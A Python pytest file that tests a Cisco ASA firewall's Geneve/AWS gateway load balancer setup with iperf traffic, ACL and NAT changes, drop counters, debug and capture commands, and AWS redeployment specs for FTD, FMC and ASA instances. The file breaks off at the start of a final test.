def test_UDP_from_outside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket,os
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_jb_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo python3 test.py; pkill python3\''"
print(cmd5)
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.mark.geneveASA
@pytest.mark.iperfudp
def test_iperf_udp(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s -u'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip} -u\''"
res = os.popen(cmd2).read()
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.iperfudpreverse
def test_iperf_udp_reverse(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s -u\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip} -u;'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.iperftcp
def test_iperf_tcp(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip}\''"
res = os.popen(cmd2).read()
try:
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
except:
bd = re.compile(" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.iperftcpreverse
def test_iperf_tcp_reverse(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip}'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
try:
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
except:
bd = re.compile(" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.counter
def test_udp_counter(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "clear asp drop"
cmd2 = "show asp drop frame geneve-invalid-udp-checksum"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd1)
send(IP(dst="20.0.1.101") / UDP(sport=20001, dport=6081, chksum=0) / b'\x08\x00\x08')
_, res = asa_config(asa_address, cmd2)
assert "geneve-invalid-udp-checksum" in res
@pytest.mark.geneveASA
@pytest.mark.reset
def test_tcp_counter(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m ssh root@{asa_jb_ip}\''"
os.popen(cmd).read()
cmd2 = "clear conn address 10.0.1.101"
cmd3 = "show asp drop"
cmd1 = "clear asp drop"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd1)
asa_config(asa_address, cmd2)
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill screen\''"
os.popen(cmd).read()
_, res = asa_config(asa_address, cmd3)
assert "tcp-not-syn" in res
@pytest.mark.geneveASA
@pytest.mark.logserver
def test_log_server(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh2 = paramiko.SSHClient()
ssh2.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
ssh2.connect(asa_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
_, stdout, _ = ssh2.exec_command("sudo ifconfig eth1 down;sudo ifconfig eth1 20.0.1.10/24;sudo ifconfig eth1 up")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 10'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
_, stdout, _ = ssh2.exec_command("sudo systemctl restart syslog")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh2.exec_command("tail -n 100 /var/log/syslog")
stdout.channel.recv_exit_status()
resp2 = "".join(stdout.readlines())
if not resp2:
continue
else:
break
assert "8.8.8.8" in resp2
ssh.close()
ssh2.close()
@pytest.mark.geneveASA
@pytest.mark.genevedebug
def test_debug_geneve(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "debug geneve encapsulation"
cmd2 = "debug geneve encapsulation 4"
cmd3 = "debug geneve decapsulation"
cmd4 = "debug geneve decapsulation 4"
cmd5 = "debug geneve all"
cmd_clean = "unde all"
cmd_show = "show debug"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
import pexpect
conn = pexpect.spawn(asa_address)
Geneve_reply(conn)
conn.sendline("en")
Geneve_reply(conn)
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve" not in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd1)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd2)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve encapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd3)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd4)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve decapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd5)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve" not in res
conn.close()
del conn
@pytest.mark.geneveASA
@pytest.mark.metaserver
def test_meta(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "no aaa authentication listener http data-interface port www"
cmd2 = "nat (data-interface,data-interface) source static gwlb interface destination static interface metadata service http80 http80"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd1)
asa_config(asa_address, cmd2)
time.sleep(20)
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.statistics
def test_stats(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "show interface vni 1"
cmd2 = "show nve 1"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
_, cont1_1 = asa_config(asa_address, cmd1)
_, cont2_1 = asa_config(asa_address, cmd2)
p1 = "(.*) packets input"
p2 = "(.*) packets output"
output_cmd1_1 = int(re.compile(p1).findall(cont1_1)[0])
output_cmd2_1 = int(re.compile(p2).findall(cont2_1)[0])
test_Basic_PingGoogle(local_run)
_, cont1_2 = asa_config(asa_address, cmd1)
_, cont2_2 = asa_config(asa_address, cmd2)
output_cmd1_2 = int(re.compile(p1).findall(cont1_2)[0])
output_cmd2_2 = int(re.compile(p2).findall(cont2_2)[0])
assert output_cmd1_2 > output_cmd1_1
assert output_cmd2_2 > output_cmd2_1
@pytest.mark.geneveASA
@pytest.mark.capture
def test_capture(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd0 = "no capture g"
cmd1 = "clear cap /all"
cmd2 = "cap g int ge trace"
cmd3 = "show capture g | in icmp: echo request"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd0)
asa_config(asa_address, cmd1)
asa_config(asa_address, cmd2)
test_Basic_PingGoogle(local_run)
time.sleep(1)
_, cont3 = asa_config(asa_address, cmd3)
pNum = int(re.compile("\d+: ").findall(cont3)[0].strip().split(":")[0])
cmd4 = f"show capture g trace packet-number {pNum}"
cmd5 = "no capture g"
_, cont4 = asa_config(asa_address, cmd4)
assert "Action: allow" in cont4
asa_config(asa_address, cmd5)
@pytest.mark.replace
@pytest.mark.reFTD
def test_replace_FTD():
cont = '''
Del_Pytest_NWInterface_FTD1(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest_NWInterface_FTD2(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest_NWInterface_FTD3(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest_SUB_Sec_2_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Pytest_NWInterface_FTD2
Del_Pytest_SUB_Sec_3_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Pytest_NWInterface_FTD3
Del_Pytest-AMI-FTD(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest-EC2-FTD(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Pytest-EC2-FTD(EC2INSTANCE):
image-id: Pytest-AMI-FTD
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
bind_to:
- Pytest-AMI-FTD
- Del_Pytest-EC2-FTD
cleanUP: True
Pytest-AMI-FTD(AMICOPY):
source-image-id: ami-025ac61040bca3a8e
# source-image-id: ami-074379cc45251cfae
source-region: us-west-2
region: us-west-1
name: ftdv
action:
bind_to:
- Del_Pytest-AMI-FTD
cleanUP: True
Pytest_SUB_Sec_2_DATA(SUBNET):
vpc-id: Test-1-169_VPC_Sec
cidr-block: 20.0.2.0/24
availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
action:
query_from:
- Test-1-169_VPC_Sec
- Test-1-169_SUB_App_1_MGMT
bind_to:
- Del_Pytest_SUB_Sec_2_DATA
- Pytest_SUB_Sec_3_DATA
cleanUP: True
Pytest_SUB_Sec_3_DATA(SUBNET):
vpc-id: Test-1-169_VPC_Sec
cidr-block: 20.0.3.0/24
availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
action:
query_from:
- Test-1-169_VPC_Sec
- Test-1-169_SUB_App_1_MGMT
bind_to:
- Del_Pytest_SUB_Sec_3_DATA
cleanUP: True
Pytest_NWInterface_FTD1(NETWORK_INTERFACE):
subnet-id: Test-1-169_SUB_Sec_DATA
description: pytest Data Network for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-1-169_SUB_Sec_DATA
- Test-1-169_SG_Sec_DATA
bind_to:
- Del_Pytest_NWInterface_FTD1
cleanUP: True
Pytest_NWInterface_FTD2(NETWORK_INTERFACE):
subnet-id: Pytest_SUB_Sec_2_DATA
description: Test-1-169 Data Network2 for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.2.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
bind_to:
- Pytest_SUB_Sec_2_DATA
- Del_Pytest_NWInterface_FTD2
cleanUP: True
Pytest_NWInterface_FTD3(NETWORK_INTERFACE):
subnet-id: Pytest_SUB_Sec_3_DATA
description: Test-1-169 Data Network3 for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.3.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
bind_to:
- Pytest_SUB_Sec_3_DATA
- Del_Pytest_NWInterface_FTD3
cleanUP: True
Pytest_NWInterface_FTD_1_Bind(BIND):
network-interface-id: Pytest_NWInterface_FTD1
instance-id: Pytest-EC2-FTD
device-index: 1
action:
bind_to:
- Pytest_NWInterface_FTD1
- Pytest-EC2-FTD
- Pytest_NWInterface_FTD_3_Bind
cleanUP: True
Pytest_NWInterface_FTD_2_Bind(BIND):
network-interface-id: Pytest_NWInterface_FTD2
instance-id: Pytest-EC2-FTD
device-index: 2
action:
bind_to:
- Pytest_NWInterface_FTD2
- Pytest-EC2-FTD
- Pytest_NWInterface_FTD_1_Bind
cleanUP: True
Pytest_NWInterface_FTD_3_Bind(BIND):
network-interface-id: Pytest_NWInterface_FTD3
instance-id: Pytest-EC2-FTD
device-index: 3
action:
bind_to:
- Pytest_NWInterface_FTD3
- Pytest-EC2-FTD
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.reFTD2
def test_replace_FTD2():
cont = '''
Del_Test-Hybrid_NWInterface_FTD1(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid_NWInterface_FTD2(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid_NWInterface_FTD3(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid_SUB_Sec_2_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Test-Hybrid_NWInterface_FTD2
Del_Test-Hybrid_SUB_Sec_3_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Test-Hybrid_NWInterface_FTD3
Del_Test-Hybrid-AMI-FTD(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid-EC2-FTD(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Test-Hybrid-EC2-FTD(EC2INSTANCE):
image-id: Test-Hybrid-AMI-FTD
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-Hybrid_SG_Sec_MGMT
count: 1
subnet-id: Test-Hybrid_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
action:
query_from:
- Test-Hybrid_SUB_Sec_MGMT
- Test-Hybrid_SG_Sec_MGMT
bind_to:
- Test-Hybrid-AMI-FTD
- Del_Test-Hybrid-EC2-FTD
cleanUP: True
Test-Hybrid-AMI-FTD(AMICOPY):
source-image-id: ami-08473057344d9dd0d
# source-image-id: ami-074379cc45251cfae
source-region: us-west-2
region: us-west-1
name: ftdv
action:
bind_to:
- Del_Test-Hybrid-AMI-FTD
cleanUP: True
Test-Hybrid_SUB_Sec_2_DATA(SUBNET):
vpc-id: Test-Hybrid_VPC_Sec
cidr-block: 20.0.2.0/24
availability-zone: '{Test-Hybrid_SUB_App_1_MGMT}'
action:
query_from:
- Test-Hybrid_VPC_Sec
- Test-Hybrid_SUB_App_1_MGMT
bind_to:
- Del_Test-Hybrid_SUB_Sec_2_DATA
- Test-Hybrid_SUB_Sec_3_DATA
cleanUP: True
Test-Hybrid_SUB_Sec_3_DATA(SUBNET):
vpc-id: Test-Hybrid_VPC_Sec
cidr-block: 20.0.3.0/24
availability-zone: '{Test-Hybrid_SUB_App_1_MGMT}'
action:
query_from:
- Test-Hybrid_VPC_Sec
- Test-Hybrid_SUB_App_1_MGMT
bind_to:
- Del_Test-Hybrid_SUB_Sec_3_DATA
cleanUP: True
Test-Hybrid_NWInterface_FTD1(NETWORK_INTERFACE):
subnet-id: Test-Hybrid_SUB_Sec_DATA
description: pytest Data Network for ASA
groups: Test-Hybrid_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-Hybrid_SUB_Sec_DATA
- Test-Hybrid_SG_Sec_DATA
bind_to:
- Del_Test-Hybrid_NWInterface_FTD1
cleanUP: True
Test-Hybrid_NWInterface_FTD2(NETWORK_INTERFACE):
subnet-id: Test-Hybrid_SUB_Sec_2_DATA
description: Test-Hybrid Data Network2 for ASA
groups: Test-Hybrid_SG_Sec_DATA
private-ip-address: 20.0.2.102
action:
query_from:
- Test-Hybrid_SG_Sec_DATA
bind_to:
- Test-Hybrid_SUB_Sec_2_DATA
- Del_Test-Hybrid_NWInterface_FTD2
cleanUP: True
Test-Hybrid_NWInterface_FTD3(NETWORK_INTERFACE):
subnet-id: Test-Hybrid_SUB_Sec_3_DATA
description: Test-Hybrid Data Network3 for ASA
groups: Test-Hybrid_SG_Sec_DATA
private-ip-address: 20.0.3.102
action:
query_from:
- Test-Hybrid_SG_Sec_DATA
bind_to:
- Test-Hybrid_SUB_Sec_3_DATA
- Del_Test-Hybrid_NWInterface_FTD3
cleanUP: True
Test-Hybrid_NWInterface_FTD_1_Bind(BIND):
network-interface-id: Test-Hybrid_NWInterface_FTD1
instance-id: Test-Hybrid-EC2-FTD
device-index: 1
action:
bind_to:
- Test-Hybrid_NWInterface_FTD1
- Test-Hybrid-EC2-FTD
- Test-Hybrid_NWInterface_FTD_3_Bind
cleanUP: True
Test-Hybrid_NWInterface_FTD_2_Bind(BIND):
network-interface-id: Test-Hybrid_NWInterface_FTD2
instance-id: Test-Hybrid-EC2-FTD
device-index: 2
action:
bind_to:
- Test-Hybrid_NWInterface_FTD2
- Test-Hybrid-EC2-FTD
- Test-Hybrid_NWInterface_FTD_1_Bind
cleanUP: True
Test-Hybrid_NWInterface_FTD_3_Bind(BIND):
network-interface-id: Test-Hybrid_NWInterface_FTD3
instance-id: Test-Hybrid-EC2-FTD
device-index: 3
action:
bind_to:
- Test-Hybrid_NWInterface_FTD3
- Test-Hybrid-EC2-FTD
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.reFMC2
def test_replace_FMC2():
cont = '''
Del_Test-Hybrid-EC2-FMC(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Del_Test-Hybrid-AMI-FMC(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
Test-Hybrid-EC2-FMC(EC2INSTANCE):
image-id: Test-Hybrid-AMI-FMC
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-Hybrid_SG_Sec_MGMT
count: 1
subnet-id: Test-Hybrid_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.13
action:
query_from:
- Test-Hybrid_SUB_Sec_MGMT
- Test-Hybrid_SG_Sec_MGMT
bind_to:
- Test-Hybrid-AMI-FMC
- Del_Test-Hybrid-EC2-FMC
cleanUP: True
Test-Hybrid-AMI-FMC(AMICOPY):
source-image-id: ami-0e8f534eeea33536b
source-region: us-west-2
region: us-west-1
name: fmcv
action:
bind_to:
- Del_Test-Hybrid-AMI-FMC
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.replace
@pytest.mark.reFMC
def test_replace_FMC():
cont = '''
Del_Pytest-EC2-FMC(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Del_Pytest-AMI-FMC(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
Pytest-EC2-FMC(EC2INSTANCE):
image-id: Pytest-AMI-FMC
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.13
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
bind_to:
- Pytest-AMI-FMC
- Del_Pytest-EC2-FMC
cleanUP: True
Pytest-AMI-FMC(AMICOPY):
source-image-id: ami-0e8f534eeea33536b
source-region: us-west-2
region: us-west-1
name: fmcv
action:
bind_to:
- Del_Pytest-AMI-FMC
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.reASA
def test_replace_ASA():
cont = '''
Del_pytest_ASA_New(TERMINATION):
type: EC2INSTANCE
Del_pytest_NWInterface_ASA_New(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_pytest_ASA_New
pytest_ASA_New(EC2INSTANCE):
image-id: ami-01cab33393210e391
instance-type: c5.xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
user-data: file://pytest_day0.txt
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
bind_to:
- Del_pytest_ASA_New
cleanUP: True
pytest_NWInterface_ASA_New(NETWORK_INTERFACE):
subnet-id: Test-1-169_SUB_Sec_DATA
description: Test-1-169 Data Network for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
- Test-1-169_SUB_Sec_DATA
bind_to:
- Del_pytest_NWInterface_ASA_New
cleanUP: True
pytest_NWInterface_ASA_Bind(BIND):
network-interface-id: pytest_NWInterface_ASA_New
instance-id: pytest_ASA_New
device-index: 1
action:
bind_to:
- pytest_NWInterface_ASA_New
- pytest_ASA_New
cleanUP: True
'''
obj = aws(record=False)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.addasa
def test_addASA():
cont = '''
